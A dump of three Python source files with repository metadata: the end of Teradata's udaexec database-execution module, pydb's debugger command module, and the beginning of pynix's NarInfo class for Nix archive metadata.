continue
if util.isString(arg):
configFiles.append(arg)
else:
configFiles.extend(arg)
class UdaExecCheckpointManager:
""" Manages the initialization and saving of checkpoints. """
def loadCheckpoint(self):
""" Return the checkpoint name that we should resume from. """
raise NotImplementedError(
"loadCheckpoint must be implemented by sub-class")
def saveCheckpoint(self, checkpointName):
""" Save the specified checkpoint """
raise NotImplementedError(
"raiseCheckpoint must be implemented by sub-class")
def clearCheckpoint(self):
""" Remove the checkpoint so that the application starts from beginning
next time around. """
raise NotImplementedError(
"clearCheckpoint must be implemented by sub-class")
class UdaExecCheckpointManagerFileImpl (UdaExecCheckpointManager):
""" Implementation of the UdaExecCheckpointMananer using a local file."""
def __init__(self, file):
self.file = file
def loadCheckpoint(self):
resumeFromCheckpoint = None
if os.path.isfile(self.file):
logger.info(u"Found checkpoint file: \"%s\"", toUnicode(self.file))
with open(self.file, "r") as f:
resumeFromCheckpoint = f.readline()
if not resumeFromCheckpoint:
logger.warn(
u"No checkpoint found in %s.", toUnicode(self.file))
else:
logger.info(u"Checkpoint file not found: %s", toUnicode(self.file))
return resumeFromCheckpoint
def saveCheckpoint(self, checkpointName):
logger.info(
"Saving checkpoint \"%s\" to %s.", checkpointName, self.file)
with open(self.file, 'w') as f:
f.write(checkpointName)
def clearCheckpoint(self):
logger.info("Removing checkpoint file %s.", self.file)
if os.path.isfile(self.file):
os.remove(self.file)
class UdaExecTemplate (string.Template):
"""Template used by UdaExec configuration and token replacement."""
idpattern = r'[a-z][_a-z0-9\.]*'
class UdaExecConfig:
"""UdaExec configuration loader and resolver."""
def __init__(self, configFiles, encoding, configSection, parseCmdLineArgs,
logMsgs):
configParser = configparser.ConfigParser()
configParser.optionxform = str
configFiles = [os.path.expanduser(f) for f in configFiles]
self.configFiles = [toUnicode(os.path.abspath(
f)) + (": Found" if os.path.isfile(f) else ": Not Found")
for f in configFiles]
logMsgs.append(
(logging.INFO,
"Reading config files: {}".format(self.configFiles)))
if sys.version_info[0] == 2:
for f in configFiles:
if os.path.isfile(f):
configParser.readfp(codecs.open(f, "r", encoding))
else:
configParser.read(configFiles, encoding)
self.configSection = configSection
self.sections = {configSection: {}}
for section in configParser.sections():
self.sections[section] = dict(configParser.items(section))
if parseCmdLineArgs:
for arg in sys.argv:
if arg.startswith('--') and '=' in arg:
(key, val) = arg.split("=", 1)
key = key[2:]
logMsgs.append(
(logging.DEBUG, u"Configuration value was set via "
"command line: {}={}".format(toUnicode(key),
toUnicode(val))))
self.sections[configSection][key] = val
def __iter__(self):
return iter(self.sections[self.configSection])
def contains(self, option):
return option in self.sections[self.configSection]
def resolveDict(self, d, sections=None):
if sections is None:
sections = [self.configSection]
for key, value in d.items():
if util.isString(value):
d[key] = self._resolve(value, sections, None, None)
return d
def resolve(self, value, sections=None, default=None, errorMsg=None):
if value is None:
if errorMsg is not None:
raise api.InterfaceError(api.CONFIG_ERROR, errorMsg)
else:
util.raiseIfNone("value", value)
if not util.isString(value):
return value
if sections is None:
sections = [self.configSection]
return self._resolve(value, sections, default, errorMsg)
def _resolve(self, value, sections, default, errorMsg):
error = None
for section in sections:
try:
s = self.sections[section]
newValue = UdaExecTemplate(
value.replace("$$", "$$$$")).substitute(**s)
if value != newValue:
value = self._resolve(newValue, sections, None, errorMsg)
else:
value = value.replace("$$", "$")
error = None
break
except KeyError as e:
error = e
if error is not None:
if default is not None:
return default
if errorMsg is not None:
raise api.InterfaceError(api.CONFIG_ERROR, errorMsg)
else:
raise api.InterfaceError(
api.CONFIG_ERROR, "Unable to resolve variable \"{}\". "
"Not found: {}".format(value, error))
return value
def section(self, section):
try:
return self.resolveDict(self.sections[section].copy(),
(section, self.configSection))
except KeyError:
return None
def __getitem__(self, key):
return self.resolve(self.sections[self.configSection][key])
def __setitem__(self, key, value):
self.sections[self.configSection][key] = value
def __str__(self):
length = 0
for key in self.sections[self.configSection]:
keyLength = len(key)
if keyLength > length:
length = keyLength
value = u"Configuration Details:\n/"
value += u'*' * 80
value += u"\n"
for key in sorted(self.sections[self.configSection]):
value += u" * {}: {}\n".format(toUnicode(key.rjust(length)),
toUnicode(
self.resolve("${" + key + "}"))
if 'password' not in key.lower()
else u'XXXX')
value += '*' * 80
value += '/'
return value
class UdaExecConnection:
"""A UdaExec connection wrapper for ODBC or REST connections."""
def __init__(self, udaexec, conn):
self.udaexec = udaexec
self.conn = conn
self.internalCursor = self.cursor()
def close(self):
self.internalCursor.close()
self.conn.close()
def commit(self):
self.conn.commit()
def rollback(self):
self.conn.rollback()
def cursor(self):
return UdaExecCursor(self.udaexec, self.conn.cursor())
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, exceptionType, exceptionValue, traceback):
self.close()
def callproc(self, procname, params, **kwargs):
return self.internalCursor.callproc(procname, params, **kwargs)
def execute(self, query=None, params=None, **kwargs):
self.internalCursor.execute(query, params, **kwargs)
return self.internalCursor
def executemany(self, query, params, **kwargs):
self.internalCursor.executemany(query, params, **kwargs)
return self.internalCursor
class UdaExecCursor:
"""A UdaExec cursor wrapper for ODBC or REST cursors."""
def __init__(self, udaexec, cursor):
self.udaexec = udaexec
self.cursor = cursor
self.skip = False
self.description = None
self.types = None
self.rowcount = -1
def callproc(self, procname, params, runAlways=False,
continueOnError=False, ignoreErrors=[], **kwargs):
self.skip = self.udaexec.skip and not runAlways
if not self.skip:
start = time.time()
try:
procname = self.udaexec.config.resolve(procname)
outparams = self.cursor.callproc(procname, params, **kwargs)
duration = time.time() - start
logger.info(
"Procedure Successful. Duration: %.3f seconds, "
"Procedure: %s, Params: %s", duration, procname, params)
return outparams
except Exception as e:
duration = time.time() - start
if isinstance(e, api.DatabaseError) and e.code in ignoreErrors:
logger.error(
"Procedure Failed! Duration: %.3f seconds, "
"Procedure: %s, Params: %s, Error Ignored: ",
duration, procname, params, e)
else:
logger.exception(
"Procedure Failed! Duration: %.3f seconds, "
"Procedure: %s, Params: %s", duration,
procname, params)
if not continueOnError:
raise
else:
logger.info(
"Skipping procedure, haven't reached resume checkpoint yet. "
"Procedure: %s", procname)
def close(self):
self.cursor.close()
def execute(self, query=None, params=None, file=None, fileType=None,
delimiter=";", **kwargs):
if file is None:
util.raiseIfNone("query", query)
if query is not None:
if util.isString(query):
self._execute(self.cursor.execute, query, params, **kwargs)
else:
for q in query:
self._execute(self.cursor.execute, q, params, **kwargs)
if file is not None:
self._executeFile(file, params, fileType, delimiter, **kwargs)
return self
def executemany(self, query, params, **kwargs):
self._execute(self.cursor.executemany, query, params, **kwargs)
return self
def _executeFile(self, file, params, fileType, delimiter, runAlways=False,
**kwargs):
self.skip = self.udaexec.skip and not runAlways
if not self.skip:
file = self.udaexec.config.resolve(file)
if fileType is None:
script = util.SqlScript(file, delimiter)
elif fileType == "bteq":
script = util.BteqScript(file)
else:
raise api.InterfaceError(
"UNKNOWN_FILE_TYPE",
"The file type '{}' is not unknown".format(fileType))
for query in script:
self._execute(
self.cursor.execute, query, params, runAlways, **kwargs)
else:
logger.info(
"Skipping file, haven't reached resume checkpoint yet. "
"File: %s", file)
def _execute(self, func, query, params, runAlways=False,
continueOnError=False, logParamFrequency=1,
logParamCharLimit=80, ignoreErrors=[],
**kwargs):
self.skip = self.udaexec.skip and not runAlways
if not self.skip:
start = time.time()
paramStr = _getParamsString(params, logParamFrequency,
logParamCharLimit)
try:
query = self.udaexec.config.resolve(query)
func(query, params, **kwargs)
self.description = self.cursor.description
self.types = self.cursor.types
self.rowcount = self.cursor.rowcount
duration = time.time() - start
rowsStr = " " if self.cursor.rowcount < 0 else \
" Rows: %s, " % self.cursor.rowcount
logger.info(
"Query Successful. Duration: %.3f seconds,%sQuery: %s%s",
duration, rowsStr, query, paramStr)
except Exception as e:
self.description = None
self.types = None
self.rowcount = -1
duration = time.time() - start
if isinstance(e, api.DatabaseError) and e.code in ignoreErrors:
logger.error(
"Query Failed! Duration: %.3f seconds, Query: %s%s, "
"Error Ignored: %s", duration, query, paramStr, e)
else:
logger.exception(
"Query Failed! Duration: %.3f seconds, Query: %s%s",
duration, query, paramStr)
if not continueOnError:
raise e
else:
logger.info(
"Skipping query, haven't reached resume checkpoint yet. "
"Query: %s", query)
def fetchone(self):
if self.skip:
return None
return self.cursor.fetchone()
def fetchmany(self, size=None):
if self.skip:
return []
return self.cursor.fetchmany(size)
def fetchall(self):
if self.skip:
return []
return self.cursor.fetchall()
def nextset(self):
if self.skip:
return None
return self.cursor.nextset()
def setinputsizes(self, sizes):
self.cursor.setinputsizes(self, sizes)
def setoutputsize(self, size, column=None):
self.cursor.setoutputsizes(self, size)
def __iter__(self):
return self
def __next__(self):
if self.skip:
raise StopIteration()
return self.cursor.__next__()
def next(self):
return self.__next__()
def __enter__(self):
return self
def __exit__(self, t, value, traceback):
self.close()
def _getParamsString(params, logParamFrequency=1, logParamCharLimit=80):
paramsStr = ""
if params and logParamFrequency > 0:
if isinstance(params[0], (list, tuple)):
index = 0
paramsStr = []
for p in params:
index += 1
if index == 1 or index % logParamFrequency == 0:
paramsStr.append(_getParamString(p, logParamCharLimit,
index))
if index != 1 and index % logParamFrequency != 0:
paramsStr.append(_getParamString(p, logParamCharLimit, index))
paramsStr = u", Params: {}".format(
u"\n".join(paramsStr))
else:
paramsStr = u", Params: {}".format(_getParamString(
params, logParamCharLimit))
return paramsStr
def _getParamString(params, logParamCharLimit=80, index=None):
paramsStr = []
for p in params:
p = repr(p)
if logParamCharLimit > 0 and len(p) > logParamCharLimit:
p = (p[:(logParamCharLimit)] + '...')
paramsStr.append(p)
prefix = u"["
if index is not None:
prefix = u"%s:[" % index
return prefix + u",".join(paramsStr) + u"]"
| {
"repo_name": "fxstein/PyTd",
"path": "teradata/udaexec.py",
"copies": "1",
"size": "35268",
"license": "mit",
"hash": -5338928629833625000,
"line_mean": 39.3986254296,
"line_max": 79,
"alpha_frac": 0.5587501418,
"autogenerated": false,
"ratio": 4.486452105330111,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5545202247130111,
"avg_score": null,
"num_lines": null
} |
"""A Python debugger command class.
Routines here have to do with parsing or processing commands, but are
not the commands themselves which are in gdb.py.in. Generally (but
not always) they are not specific to pydb. They are sort of more
oriented towards any gdb-like debugger. Also routines that need to be
changed from cmd are here.
$Id: pydbcmd.py,v 1.47 2008/04/16 01:20:47 rockyb Exp $"""
import cmd, linecache, sys, types
from fns import *
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pydb is imported using the
# command "pydb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Cmd(cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None):
cmd.Cmd.__init__(self, completekey, stdin, stdout)
self._user_requested_quit = False
self.aliases = {}
self.cmdtrace = False
self.flush = False # flush after each write
self.logging = False
self.logging_file = "pydb.txt"
self.logging_fileobj = None # file object from open()
self.logging_overwrite = False
self.logging_redirect = False
self.nohelp = 'Undefined command or invalid expression \"%s\".\nType \"help\" for a list of debugger commands.'
self.prompt = '(Pydb) '
self.rcLines = []
def print_source_line(self, lineno, line):
"""Print out a source line of text , e.g. the second
line in:
(/tmp.py:2): <module>
2 import sys,os
(Pydb)
We define this method
specifically so it can be customized for such applications
like ipython."""
# We don't use the filename normally. ipython and other applications
# however might.
self.msg_nocr('%d %s' % (lineno, line))
return
def _runscript(self, filename):
# When bdb sets tracing, a number of call and line events happens
# BEFORE debugger even reaches user's code (and the exact sequence of
# events depends on python version). So we take special measures to
# avoid stopping before we reach the main script (see user_line and
# user_call for details).
self._wait_for_mainpyfile = True
self.mainpyfile = self.canonic(filename)
# Start with fresh empty copy of globals and locals and tell the script
# that it's being run as __main__ to avoid scripts being able to access
# the pydb.py namespace.
globals_ = {"__name__" : "__main__",
"__file__" : self.mainpyfile,
"__builtins__" : __builtins__
}
locals_ = globals_
statement = 'execfile( "%s")' % filename
self.running = True
self.run(statement, globals=globals_, locals=locals_)
return
def default(self, line):
"""Method called on an input line when the command prefix is
not recognized. In particular we ignore # comments and execute
Python commands which might optionally start with $"""
if line[:1] == '#': return
if line[:1] == '$': line = line[1:]
if not self.autoeval:
self.errmsg("""Undefined command: "%s". Try "help".""" % line)
return
if self.curframe:
local_vars = self.curframe.f_locals
global_vars = self.curframe.f_globals
else:
local_vars = None
# FIXME: should probably have place where the
# user can store variables inside the debug session.
# The setup for this should be elsewhere. Possibly
# in interaction.
global_vars = None
try:
code = compile(line + '\n', '"%s"' % line, 'single')
exec code in global_vars, local_vars
except:
t, v = sys.exc_info()[:2]
if type(t) == types.StringType:
exc_type_name = t
else: exc_type_name = t.__name__
self.errmsg('%s: %s' % (str(exc_type_name), str(v)))
### This comes from cmd.py with self.stdout.write replaced by self.msg.
### Also we extend to given help on an object name. The
### Docstring has been updated to reflect all of this.
def do_help(self, arg):
"""help [command [subcommand]|expression]
Without argument, print the list of available debugger commands.
When an argument is given, it is first checked to see if it is command
name. 'help exec' gives help on the ! command.
With the argument is an expression or object name, you get the same
help that you would get inside a Python shell running the built-in
help() command.
If the environment variable $PAGER is defined, the file is
piped through that command. You'll notice this only for long help
output.
Some commands like 'info', 'set', and 'show' can accept an
additional subcommand to give help just about that particular
subcommand. For example 'help info line' give help about the
\code{info line} command.
See also 'examine' an 'whatis'.
"""
# We don't want to repeat the last help command. That makes
# not much sense and if give help that uses PAGER we may
# turn a quit CR into rerunning the help command.
self.lastcmd=''
if arg:
first_arg = arg.split()[0]
try:
func = getattr(self, 'help_' + first_arg)
func(arg.split()[1:])
except AttributeError:
try:
doc=getattr(self, 'do_' + first_arg).__doc__
self.msg("%s\n" % str(doc))
return
except AttributeError:
# If we have an object run site helper on that
try:
if not self.curframe:
# ?? Should we have set up a dummy globals
# to have persistence?
value = eval(arg, None, None)
else:
value = eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
from site import _Helper
h=_Helper()
h.__call__(value)
except:
self.msg("%s\n" % str(self.nohelp % (first_arg,)))
return
return
else:
names = self.get_names()
cmds_doc = []
cmds_undoc = []
help_dict = {}
for name in names:
if name[:5] == 'help_':
help_dict[name[5:]]=1
names.sort()
# There can be duplicates if routines overridden
prevname = ''
for name in names:
if name[:3] == 'do_':
if name == prevname:
continue
prevname = name
cmd=name[3:]
if cmd in help_dict:
cmds_doc.append(cmd)
del help_dict[cmd]
elif getattr(self, name).__doc__:
cmds_doc.append(cmd)
else:
cmds_undoc.append(cmd)
self.msg("%s\n" % str(self.doc_leader))
self.print_topics(self.doc_header, cmds_doc, 15,
self.width)
self.print_topics(self.misc_header, help_dict.keys(),15,
self.width)
self.print_topics(self.undoc_header, cmds_undoc, 15,
self.width)
do_h = do_help
# Can be executed earlier than 'setup' if desired
def execRcLines(self):
"""Some commands were batched in self.rcLines. Run as many of
them as we can now.
To be compatible with onecmd will return 1 if we are to
continue execution and None if not -- continue debugger
commmand loop reading. The remaining lines will still be in
self.rcLines."""
if self.rcLines:
# Make local copy because of recursion
rcLines = self.rcLines
# executed only once
for line in rcLines:
self.rcLines = self.rcLines[1:]
line = line[:-1]
if len(line) > 0:
# Some commands like step, continue,
# return return 1 to indicate execution
# should be continued. The return code
# value is kind of sucky but at present
# it's too much work to fix all of the
# places needed. So live with it.
if self.onecmd(line) == 1:
return 1
def get_an_int(self, arg, errmsg=None, min_value=None, max_value=None):
"""Another get_int() routine, this one simpler and less stylized
than get_int(). We eval arg return it as an integer value or
None if there was an error in parsing this.
"""
ret_value = None
if arg:
try:
# eval() is used so we will allow arithmetic expressions,
# variables etc.
ret_value = int(eval(arg))
except (SyntaxError, NameError, ValueError):
if errmsg:
self.errmsg(errmsg)
else:
self.errmsg('Expecting an integer, got: %s.' % str(arg))
return None
if min_value and ret_value < min_value:
self.errmsg('Expecting integer value to be at least %d, got: %d.' %
(min_value, ret_value))
return None
elif max_value and ret_value > max_value:
self.errmsg('Expecting integer value to be at most %d, got: %d.' %
(max_value, ret_value))
return None
return ret_value
def get_int(self, arg, default=1, cmdname=None):
"""If arg is an int, use that otherwise take default."""
if arg:
try:
# eval() is used so we will allow arithmetic expressions,
# variables etc.
default = int(eval(arg))
except (SyntaxError, NameError, ValueError):
if cmdname:
self.errmsg('%s command: Expecting an integer, got: %s.' %
(cmdname, str(arg)))
else:
self.errmsg('Expecting an integer, got: %s.' % str(arg))
raise ValueError
return default
def get_onoff(self, arg, default=None, print_error=True):
"""Return True if arg is 'on' or 1 and False arg is 'off' or 0.
Any other value is raises ValueError."""
if not arg:
if default is None:
if print_error:
self.errmsg("Expecting 'on', 1, 'off', or 0. Got nothing.")
raise ValueError
return default
if arg == '1' or arg == 'on': return True
if arg == '0' or arg =='off': return False
if print_error:
self.errmsg("Expecting 'on', 1, 'off', or 0. Got: %s." % str(arg))
raise ValueError
def get_pos_int(self, arg, min_value=0, default=1, cmdname=None):
"""If no argument use the default If arg is a positive int at
least min_value, use that otherwise report an error."""
if arg:
try:
# eval() is used so we will allow arithmetic expressions,
# variables etc.
default = int(eval(arg))
if default < min_value:
if cmdname:
self.errmsg(('%s command: Expecting a positive ' +
'integer at least %d, got: %d.')
% (cmdname, min_value, default))
else:
self.errmsg(('Expecting a positive ' +
'integer at least %d, got: %d')
% (min_value, default))
# Really should use something custom?
raise ZeroDivisionError
except (SyntaxError, NameError, ValueError):
if cmdname:
self.errmsg(('%s command: Expecting a positive integer, '
+ "got: %s") % (cmdname, str(arg)))
else:
self.errmsg(('Expecting a positive integer, '
+ "got: %s") % str(arg))
raise ValueError
except ZeroDivisionError:
# Turn this into a ValueError
raise ValueError
return default
def getval(self, arg):
try:
return eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else: exc_type_name = t.__name__
self.errmsg(str("%s: %s" % (exc_type_name, arg)))
raise
def errmsg(self, msg, prefix="*** "):
"""Common routine for reporting debugger error messages.
Derived classed may want to override this to capture output.
"""
self.msg_nocr("%s%s\n" %(prefix, msg))
def handle_command_def(self,line):
""" Handles one command line during command list
definition. """
cmd, arg, line = self.parseline(line)
if cmd == 'silent':
self.commands_silent[self.commands_bnum] = True
return # continue to handle other cmd def in the cmd list
elif cmd == 'end':
self.cmdqueue = []
return 1 # end of cmd list
cmdlist = self.commands[self.commands_bnum]
if (arg):
cmdlist.append(cmd+' '+arg)
else:
cmdlist.append(cmd)
# Determine if we must stop
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
func = self.default
if func.func_name in self.commands_resuming :
# one of the resuming commands.
self.commands_doprompt[self.commands_bnum] = False
self.cmdqueue = []
return 1
return
def msg(self, msg, out=None):
"""Common routine for reporting messages.
Derived classed may want to override this to capture output.
"""
self.msg_nocr("%s\n" % msg, out)
def msg_nocr(self, msg, out=None):
"""Common routine for reporting messages (no carriage return).
Derived classed may want to override this to capture output.
"""
do_print = True
if self.logging:
if self.logging_fileobj is not None:
print >> self.logging_fileobj, msg,
if self.flush: self.logging_fileobj.flush()
do_print = not self.logging_redirect
if do_print:
if out is None:
out = self.stdout
print >> out, msg,
if self.flush: out.flush()
def precmd(self, line):
"""Method executed just before the command line line is
interpreted, but after the input prompt is generated and
issued.
Handle alias expansion and ';;' separator."""
if not line.strip():
return line
args = line.split()
while args[0] in self.aliases:
line = self.aliases[args[0]]
ii = 1
for tmpArg in args[1:]:
line = line.replace("%" + str(ii),
tmpArg)
ii = ii + 1
line = line.replace("%*", ' '.join(args[1:]))
args = line.split()
# split into ';;' separated commands
# unless it's an alias command
if args[0] != 'alias':
marker = line.find(';;')
if marker >= 0:
# queue up everything after marker
next = line[marker+2:].lstrip()
self.cmdqueue.append(next)
line = line[:marker].rstrip()
return line
def print_location(self, print_line=False):
"""Show where we are. GUI's and front-end interfaces often
use this to update displays. So it is helpful to make sure
we give at least some place that's located in a file.
"""
i_stack = self.curindex
while i_stack >= 0:
frame_lineno = self.stack[i_stack]
i_stack -= 1
frame, lineno = frame_lineno
# Next check to see that local variable breadcrumb exists and
# has the magic dynamic value.
# If so, it's us and we don't normally show this.a
if 'breadcrumb' in frame.f_locals:
if self.run == frame.f_locals['breadcrumb']:
break
filename = self.filename(self.canonic_filename(frame))
self.msg_nocr('(%s:%s):' % (filename, lineno))
fn_name = frame.f_code.co_name
if fn_name and fn_name != '?':
self.msg(" %s" % frame.f_code.co_name)
else:
self.msg("")
if print_line:
self.msg_nocr('+ ')
line=linecache.getline(filename, lineno)
if line and len(line.strip()) != 0:
self.print_source_line(lineno, line)
# If we are stopped at an "exec" or print the next outer
# location for that front-ends tracking source execution.
if not is_exec_stmt(frame):
break
def onecmd(self, line):
"""Interpret the argument as though it had been typed
in response to the prompt.
Checks whether this line is typed in the normal
prompt or in a breakpoint command list definition """
if not self.commands_defining:
if self.cmdtrace: self.msg("+%s" % line)
return cmd.Cmd.onecmd(self, line)
else:
return self.handle_command_def(line)
def undefined_cmd(self, cmd, subcmd):
"""Error message when subcommand asked for but doesn't exist"""
self.errmsg("Undefined %s command \"%s\"." % (cmd, subcmd))
#### From SoC project. Look over.
def _disconnect(self):
""" Disconnect a connection. """
if self.connection:
self.connection.disconnect()
self._rebind_output(self.orig_stdout)
self._rebind_input(self.orig_stdin)
self.connection = None
if hasattr(self, 'local_prompt') and self.local_prompt is not None:
self.prompt = self.local_prompt
self.local_prompt = None
self.onecmd = lambda x: pydb.Pdb.onecmd(self, x)
self.target = 'local'
def _rebind_input(self, new_input):
self.stdin = new_input
def _rebind_output(self, new_output):
self.stdout.flush()
self.stdout = new_output
if not hasattr(self.stdout, 'flush'):
self.stdout.flush = lambda: None
def remote_onecmd(self, line):
""" All commands in 'line' are sent across this object's connection
instance variable.
"""
if not line:
# Execute the previous command
line = self.lastcmd
# This is the simplest way I could think of to do this without
# breaking any of the inherited code from pydb/pdb. If we're a
# remote client, always call 'rquit' (remote quit) when connected to
# a pdbserver. This executes extra code to allow the client and server
# to quit cleanly.
if 'quit'.startswith(line):
line = 'rquit'
self.connection.write(line)
# Reset the onecmd method
self.onecmd = pydb.Pdb.onecmd
self.do_rquit(None)
return
if 'detach'.startswith(line):
self.connection.write('rdetach')
self.do_detach(None)
self.connection.write(line)
ret = self.connection.readline()
if ret == '':
self.errmsg('Connection closed unexpectedly')
self.onecmd = lambda x: pydb.Pdb.onecmd(self, x)
self.do_rquit(None)
# The output from the command that we've just sent to the server
# is returned along with the prompt of that server. So we keep reading
# until we find our prompt.
i = 1
while ret.find('(Pydb)') != -1:
if i == 100:
# We're probably _never_ going to get that data and that
# connection is probably dead.
self.errmsg('Connection died unexpectedly')
self.onecmd = pydb.Pdb.onecmd
self.do_rquit(None)
else:
ret += self.connection.readline()
i += 1
# Some 'special' actions must be taken depending on the data returned
if 'restart_now' in ret:
self.connection.write('ACK:restart_now')
self.errmsg('Pdbserver restarting..')
# We've acknowledged a restart, which means that a new pdbserver
# process is started, so we have to connect all over again.
self._disconnect()
import time
time.sleep(3.0)
if not self.do_target(self.target_addr):
# We cannot trust these variables below to be in a
# stable state. i.e. if the pdbserver doesn't come back up.
self.onecmd = lambda x: pydb.Pdb.onecmd(self, x)
return
self.msg_nocr(ret)
self.lastcmd = line
return
| {
"repo_name": "carlgao/lenga",
"path": "images/lenny64-peon/usr/share/python-support/pydb/pydb/pydbcmd.py",
"copies": "1",
"size": "22247",
"license": "mit",
"hash": -2782236886588068000,
"line_mean": 39.0846846847,
"line_max": 133,
"alpha_frac": 0.5266328044,
"autogenerated": false,
"ratio": 4.429908403026682,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0052778157085397485,
"num_lines": 555
} |
"""A python embedding of a NarInfo object."""
import base64
import sys
if sys.version_info >= (3, 0):
from functools import lru_cache
import lzma
from io import BytesIO
else:
from repoze.lru import lru_cache
from backports import lzma
from StringIO import StringIO as BytesIO
import logging
import os
from os.path import join, basename, dirname
import yaml
from subprocess import check_output, Popen, PIPE
import gzip
import bz2
from pynix.derivation import Derivation
from pynix.utils import (decode_str, strip_output, nix_cmd, query_store,
is_path_in_store)
from pynix.exceptions import NoNarGenerated, NixImportFailed
# Magic 8-byte number that comes at the beginning of the export's bytes.
EXPORT_INITIAL_MAGIC = b"\x01" + (b"\x00" * 7)
# Magic 8-byte number that comes after the NAR, before export metadata.
EXPORT_METADATA_MAGIC = b"NIXE\x00\x00\x00\x00"
# A bytestring of 8 zeros, used below.
EIGHT_ZEROS = bytes(8)
# Compression types which are allowed for NARs.
COMPRESSION_TYPES = ("xz", "bzip2")
COMPRESSION_TYPE_ALIASES = {"xzip": "xz", "bz2": "bzip2"}
def resolve_compression_type(compression_type):
"""Turn a compression type string into a valid one.
:raises: ``ValueError`` if the compression type is invalid.
"""
if compression_type in COMPRESSION_TYPE_ALIASES:
return COMPRESSION_TYPE_ALIASES[compression_type]
elif compression_type in COMPRESSION_TYPES:
return compression_type
else:
raise ValueError("Invalid compression type: {}"
.format(compression_type))
class NarInfo(object):
# Cache of narinfo's that have been parsed, to avoid duplicate work.
NARINFO_CACHE = {"xz": {}, "bzip2": {}}
# Cache mapping store objects to their compressed NAR paths.
NAR_PATH_CACHE = {"xz": {}, "bzip2": {}}
def __init__(self, store_path, url, compression,
nar_size, nar_hash, file_size, file_hash,
references, deriver, signature):
"""Initializer.
:param url: The URL at which this NAR can be fetched.
:type url: ``str``
:param store_path: The nix store path the NAR compresses.
:type store_path: ``str``
:param compression: How the nix store path has been compressesed.
:type compression: ``str``
:param nar_size: The size of the nix archive, in bytes.
:type nar_size: ``int``
:param nar_hash: The hash of the nix archive, in <type>:<hash> format.
:type nar_hash: ``str``
:param file_size: The size of the archived nix store object, in bytes.
:type file_size: ``int``
:param file_hash: The hash of the store object in <type>:<hash> format.
:type file_hash: ``str``
:param references: A list of the base paths of other store
paths the object references.
:type references: ``list`` of ``str``
:param deriver: Path to the derivation used to build path (optional).
:type deriver: ``str`` or ``NoneType``
:param signature: Signature guaranteeing correctness (optional).
:type signature: ``str`` or ``NoneType``
"""
# We require a particular nar_hash.
if not nar_hash.startswith("sha256:"):
raise ValueError("NAR hash must be sha256.")
elif len(nar_hash) != 59:
raise ValueError("Hash must be encoded in base-32 (length 59)")
self.url = url
self.store_path = store_path
self.compression = compression
self.nar_size = nar_size
self.nar_hash = nar_hash
self.file_size = file_size
self.file_hash = file_hash
self.references = list(sorted(basename(r) for r in references))
self.deriver = basename(deriver) if deriver else None
self.signature = signature
def __repr__(self):
return "NarInfo({})".format(self.store_path)
def __str__(self):
args = ",".join("{}={}".format(k, repr(v))
for k, v in vars(self).items())
return "NarInfo({})".format(args)
def to_dict(self):
"""Generate a dictionary representation."""
result = {
"URL": self.url,
"StorePath": self.store_path,
"Compression": self.compression,
"NarHash": self.nar_hash,
"NarSize": self.nar_size,
"FileSize": self.file_size,
"FileHash": self.file_hash,
"References": self.references,
}
if self.deriver is not None:
result["Deriver"] = self.deriver
if self.signature is not None:
result["Sig"] = self.signature
return result
def to_string(self):
"""Generate a string representation."""
as_dict = self.to_dict()
as_dict["References"] = " ".join(as_dict["References"])
return "\n".join("{}: {}".format(k, v) for k, v in as_dict.items())
def abspath_of(self, path):
"""Join a path with the nix store path to make it absolute.
:param path: A path in the nix store.
:type path: ``str``
:return: The absolute path of that path, in the nix store.
:rtype: ``str``
"""
store_dir = os.path.dirname(self.store_path)
return os.path.join(store_dir, path)
@property
def abs_references(self):
"""Return absolute paths of references.
:return: A list of store paths.
:rtype: ``list`` of ``str``
"""
return [self.abspath_of(r) for r in self.references]
@property
def abs_deriver(self):
"""Return the absolute path of the deriver, if it is set.
:return: A store path or None.
:rtype: ``str`` or ``NoneType``
"""
if self.deriver is not None:
return self.abspath_of(self.deriver)
else:
return None
def nar_to_export(self, nar_bytes):
"""Use the narinfo metadata to convert a nar bytestring to an export.
:param nar_bytes: Raw bytes of a nix archive.
:type nar_bytes: ``bytes``
:return: A nar export.
:rtype: :py:class:`NarExport`
"""
return NarExport(self.store_path, nar_bytes=nar_bytes,
references=self.abs_references,
deriver=self.abs_deriver, signature=self.signature)
def import_to_store(self, compressed_nar):
"""Given a compressed NAR, extract it and import it into the nix store.
:param compressed_nar: The bytes of a NAR, compressed.
:type compressed_nar: ``str``
"""
# Figure out how to extract the content.
if self.compression.lower() in ("xz", "xzip"):
data = lzma.decompress(compressed_nar)
elif self.compression.lower() in ("bz2", "bzip2"):
data = bz2.decompress(compressed_nar)
else:
data = gzip.decompress(compressed_nar)
# Once extracted, convert it into a nix export object and import.
export = self.nar_to_export(data)
imported_path = export.import_to_store()
return imported_path
@classmethod
def from_dict(cls, dictionary):
"""Given a dictionary representation, convert it to a NarInfo.
:param dictionary: Dictionary representation, in the form
given by `self.to_dict()`, except that keys
are case insensitive.
:type dictionary: ``dict``
:return: A ``NarInfo`` object.
:rtype: :py:class:`NarInfo`
"""
# Convert keys to lower case
dictionary = {k.lower(): v for k, v in dictionary.items()}
url = dictionary["url"]
store_path = dictionary["storepath"]
compression = dictionary["compression"]
nar_size = int(dictionary["narsize"])
nar_hash = dictionary["narhash"]
file_size = int(dictionary["filesize"])
file_hash = dictionary["filehash"]
references = dictionary.get("references") or []
if isinstance(references, str):
references = references.split()
deriver = dictionary.get("deriver") or None
signature = dictionary.get("sig")
return cls(url=url, store_path=store_path, compression=compression,
nar_size=nar_size, nar_hash=nar_hash, file_size=file_size,
file_hash=file_hash, references=references, deriver=deriver,
signature=signature)
@classmethod
def from_string(cls, string):
"""Parse a string into a NarInfo."""
return cls.from_dict(yaml.load(string))
@classmethod
def build_nar(cls, store_path, compression_type="xz", quiet=False):
"""Build a nix archive (nar) and return the resulting path."""
if compression_type not in cls.NAR_PATH_CACHE:
